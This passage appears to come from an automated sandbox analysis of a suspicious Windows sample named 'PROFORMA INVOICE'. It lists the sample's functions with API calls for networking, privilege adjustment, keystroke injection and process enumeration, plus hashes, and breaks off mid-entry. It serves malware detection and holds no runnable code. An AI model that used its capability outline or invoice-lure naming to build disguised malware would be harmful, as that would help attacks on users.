__wsplitpath.LIBCMT ref: 00FA65A7
_wcscat.LIBCMT ref: 00FA65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FA65F9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: b7dc5b22a737a315fc9ac866a83cc45143b37146fa15f6e4362007c93d6da272
Instruction ID: def3401178bd7abd68efe88ec7dfd38c8b02d6957b9960f7a0bdc29a967014eb
Opcode Fuzzy Hash: b7dc5b22a737a315fc9ac866a83cc45143b37146fa15f6e4362007c93d6da272
Instruction Fuzzy Hash: 602192B1D00258AFDB10ABA4CC88FEEB7BCAB09310F5404A9F505E7141EB759F85EB60

Function 00F69B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00F69ED4
VUUU, xrefs: 00F69EA7
VUUU, xrefs: 00F69E95
ERCP, xrefs: 00F69C32
VUUU, xrefs: 00FEBE14
mmmmmm, xrefs: 00FEBD23

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$mmmmmm
API String ID: 0-856741556
Opcode ID: d584807c5db4883d998b2bb6a51ef20d14081b5995e42a0c572ab72d80449020
Instruction ID: 740fb04997fd3e73fc79f9240cd19b079ce8e7435a20f0336d71de48af547be2
Opcode Fuzzy Hash: d584807c5db4883d998b2bb6a51ef20d14081b5995e42a0c572ab72d80449020
Instruction Fuzzy Hash: 8492C071E0425ACBDF24CF59C8407AEB3B1FB54324F2481AAE816EB280D7759D81EF91

Function 00FB923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FBA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00FB9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 00FB92B9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: ad9908dac009e7f5a202c0f055cc312bd52518d3d02f80ae6ca30e2eee287b5c
Instruction ID: 428953849241dadda8440ada19e3d1c0f670b6c6feed7cb7fefc50a6633c5394
Opcode Fuzzy Hash: ad9908dac009e7f5a202c0f055cc312bd52518d3d02f80ae6ca30e2eee287b5c
Instruction Fuzzy Hash: 1B41E670600104AFEB10AB28CC82E7E77EDEF44724F14844DF9569B3C2CB789D01AB91

Function 00FAEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FAEB8A
_wcscmp.LIBCMT ref: 00FAEBBA
_wcscmp.LIBCMT ref: 00FAEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 00FAEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FAEC0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 41f3b6d9035e512591a0096b113bed150e877b6d73073ad15dcb5fa11b4c74ff
Instruction ID: f2e5ac15e3ea3450727262a0d0d7452450bf5ea852277df71501f39da4683acf
Opcode Fuzzy Hash: 41f3b6d9035e512591a0096b113bed150e877b6d73073ad15dcb5fa11b4c74ff
Instruction Fuzzy Hash: 5941B1756003029FDB08DF28C891E9AB7E4FF4A324F10455EE95A8B3A1DB35E944DB91

Function 00FC8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00FC8160
IsWindowEnabled.USER32 ref: 00FC816E
GetForegroundWindow.USER32(?,?,00000001), ref: 00FC817B
IsIconic.USER32 ref: 00FC8189
IsZoomed.USER32 ref: 00FC8197

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: d602c3dde075c5d91ab3637362ba13862e1c7ac60b5e891f19a14fb90804fa47
Instruction ID: bb8ce7953826ebb25b40bbe38335e39a6014024fb6b7b57c2bf08ab56f1fd9b6
Opcode Fuzzy Hash: d602c3dde075c5d91ab3637362ba13862e1c7ac60b5e891f19a14fb90804fa47
Instruction Fuzzy Hash: 6F11D0317002166FE7215F269D86F6F77D8EF903A0B08442DF809DB281CF349903A6A1

Function 00F7E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F7E014,74DF0AE0,00F7DEF1,00FFDC38,?,?), ref: 00F7E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F7E03E

Strings

GetNativeSystemInfo, xrefs: 00F7E038
kernel32.dll, xrefs: 00F7E027

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: cf9c6c8efacbd54bb21f9bb6340460ae146996c035e719f10acec2c15df4eebc
Instruction ID: 6a3107a58fee2a8a07b6c83ea9bc5b650b6da7a9964cfcaf70fd037258a7fb2b
Opcode Fuzzy Hash: cf9c6c8efacbd54bb21f9bb6340460ae146996c035e719f10acec2c15df4eebc
Instruction Fuzzy Hash: 30D0A7309007129FD7314F61EC4C61276E8AB06314F28845FE4C5D6510D7FCC8849750

Function 00FA13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FA13DC

Strings

(, xrefs: 00FA1422
|, xrefs: 00FA140C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 565afe37678c7c770ddcda0eca6633a620a96e9295b4cdff79ed82dedb606076
Instruction ID: af523d25b8b4df2076471894b7592cd1f12dcba826c59e9cdd2112ee24970d10
Opcode Fuzzy Hash: 565afe37678c7c770ddcda0eca6633a620a96e9295b4cdff79ed82dedb606076
Instruction Fuzzy Hash: CB3206B5A006059FC728DF69C480A6AB7F0FF49320F16C56EE59ADB3A1D770E941CB44

Function 00F7B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00F7B22F

Part of subcall function 00F7B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F7B5A5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: b0a2085b63d2f570d59957e24c93b0fa5178a347e5806b8726272e79b8d704c5
Instruction ID: b1b58b9f82da8dbe3f113cdb0c76d208623be845784dc3ec394ec77801f81884
Opcode Fuzzy Hash: b0a2085b63d2f570d59957e24c93b0fa5178a347e5806b8726272e79b8d704c5
Instruction Fuzzy Hash: DEA13771515105BAD63ABB295C89FBF395EEB47360B18C11FF44ADA682CB299C00F273

Function 00FB4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FB43BF,00000000), ref: 00FB4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FB4FD2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 6052e0fed505e9ed7555b15941b2634a00e52a67e9a7670136af76e46e1ce32f
Instruction ID: af893ba825167090fb3a40979dae13377792a645bd0c5411507e2fe382d143ac
Opcode Fuzzy Hash: 6052e0fed505e9ed7555b15941b2634a00e52a67e9a7670136af76e46e1ce32f
Instruction Fuzzy Hash: 5F41C67290420ABFEB109E86DD85FFB77ACEB40764F10402AF60567182D675AE45BA60

Function 00FAE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FAE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FAE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FAE2B4

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c49c9c98ebd7f93f0a7c4d2879e68c44fb1d2dc9a428d4071b86e093bd7d56a4
Instruction ID: cad8dbf6d3e625b11aacfdf41d1767b43d240e41e931e5f72cb93daada0ca00e
Opcode Fuzzy Hash: c49c9c98ebd7f93f0a7c4d2879e68c44fb1d2dc9a428d4071b86e093bd7d56a4
Instruction Fuzzy Hash: E8219A75A00218EFDB00EFA4D884AADBBF8FF49314F0480AAE945EB351CB359905DB50

Function 00F9B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F7F4EA: std::exception::exception.LIBCMT ref: 00F7F51E
Part of subcall function 00F7F4EA: __CxxThrowException@8.LIBCMT ref: 00F7F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F9B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F9B1AD
GetLastError.KERNEL32 ref: 00F9B1BA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: f382fd2d459e2760d2acd35af65e16ed19f73e1379af26916afe2a26a3a5113e
Instruction ID: 06dccce6bc751148b37dc5bfb799dcf59a136da262d24c424c88afbeae9bc70d
Opcode Fuzzy Hash: f382fd2d459e2760d2acd35af65e16ed19f73e1379af26916afe2a26a3a5113e
Instruction Fuzzy Hash: 3211CEB2800205AFE718EF64EDC5D2BB7BDFB44320B20852EE05A97240DB70FC419A60

Function 00FA6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FA66AF
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00FA66EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FA66F5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: db2412b06b4d151d480dd2a4dc53bccf8e1889399835f6edc770c569e6d472c7
Instruction ID: b34e400a6f396b3025c9711f12f167ae8ca8fa36503ea829571ba8d78b105dcc
Opcode Fuzzy Hash: db2412b06b4d151d480dd2a4dc53bccf8e1889399835f6edc770c569e6d472c7
Instruction Fuzzy Hash: BC11C8B2D11228BFE7118BA8DC45FAF7BBCEB05754F104555F901E7190C2749E0497A1

Function 00FA71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FA7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FA723A
FreeSid.ADVAPI32(?), ref: 00FA724A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8de51696ed407f8e61d52d7be1844a9c02694d872d4d767620b6b81dcbef2667
Instruction ID: f1f58a0f94b945b8f6f772a9330a76bebc68e975200903ba086ebea5d89085f0
Opcode Fuzzy Hash: 8de51696ed407f8e61d52d7be1844a9c02694d872d4d767620b6b81dcbef2667
Instruction Fuzzy Hash: A5F01776A0430DBFDF04DFE4DD89EEEBBBCEF08201F104869A612E6591E2749A449B10

Function 00FAF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FAF599
FindClose.KERNEL32(00000000), ref: 00FAF5C9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 777dd0849d62ec8d0af633db8fc5ddd47f15d60868f4e3d6888f653b90bbd3cf
Instruction ID: f8a6c54a02723361fb350729d02a2ddc7c70dbaa4ce073e393388e2a8e9518de
Opcode Fuzzy Hash: 777dd0849d62ec8d0af633db8fc5ddd47f15d60868f4e3d6888f653b90bbd3cf
Instruction Fuzzy Hash: D511C8726002049FD710DF68DC45A2EB3E8FF95324F04851EF869DB391CB34AD059B81

Function 00FACE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FBBE6A,?,?,00000000,?), ref: 00FACEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FBBE6A,?,?,00000000,?), ref: 00FACEB9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 649ff67238b99ee876adc0c6ee1fccdbf5a7a1e1532245e8f7e0cf1267e8dab9
Instruction ID: 14c2a74e9ec82edc30852bc7b27830aeb0382317a29cf74421f39bb3438a4069
Opcode Fuzzy Hash: 649ff67238b99ee876adc0c6ee1fccdbf5a7a1e1532245e8f7e0cf1267e8dab9
Instruction Fuzzy Hash: C9F0827150022DABDB10ABA4DC89FEA776DFF09361F008165F915D6181D7309A44DBA1

Function 00FA411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FA4153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00FA4166

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 43e87a1ca0f8565c8d1fedd47442c53075ad193dd2630956eeb4bd4ff51d1f80
Instruction ID: 772949f62af8cecd37b8f1dedee139d9c3efcb3dd8d091c24596784c2fe0c743
Opcode Fuzzy Hash: 43e87a1ca0f8565c8d1fedd47442c53075ad193dd2630956eeb4bd4ff51d1f80
Instruction Fuzzy Hash: 0CF06D7080038DAFDB068FA0C845BBE7BB4EF00305F048409F9659A191D7B99612AFA0

Function 00F9AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F9ACC0), ref: 00F9AB99
CloseHandle.KERNEL32(?,?,00F9ACC0), ref: 00F9ABAB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c1470d4ad57d4e5fae3fa4739e5a55212ac46657721768becf32fa34eeb3c837
Instruction ID: 953add8325c2c662128f4402a636f0513d92ebb85bc3d6e0fb578d6e181a0678
Opcode Fuzzy Hash: c1470d4ad57d4e5fae3fa4739e5a55212ac46657721768becf32fa34eeb3c837
Instruction Fuzzy Hash: 6AE0E675000510AFE7252F54EC05D7777EAEF04320714C429F55985870D7625C94EB51

Function 00F881AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00F86DB3,-0000031A,?,?,00000001), ref: 00F881B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F881BA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9a0f9c14d7d71f16ffc1a30519cb60d79ffbacb5490ade89411c15ec6224c650
Instruction ID: f630e548b8a9649b05c771abb6dd32c8055ba674c4a96fe195cad92931546ca2
Opcode Fuzzy Hash: 9a0f9c14d7d71f16ffc1a30519cb60d79ffbacb5490ade89411c15ec6224c650
Instruction Fuzzy Hash: 7AB0923204464CAFDB002BA1EC49B597F68EB08652F004010F60D488A18B735410AA92

Function 00F677B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F67921

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
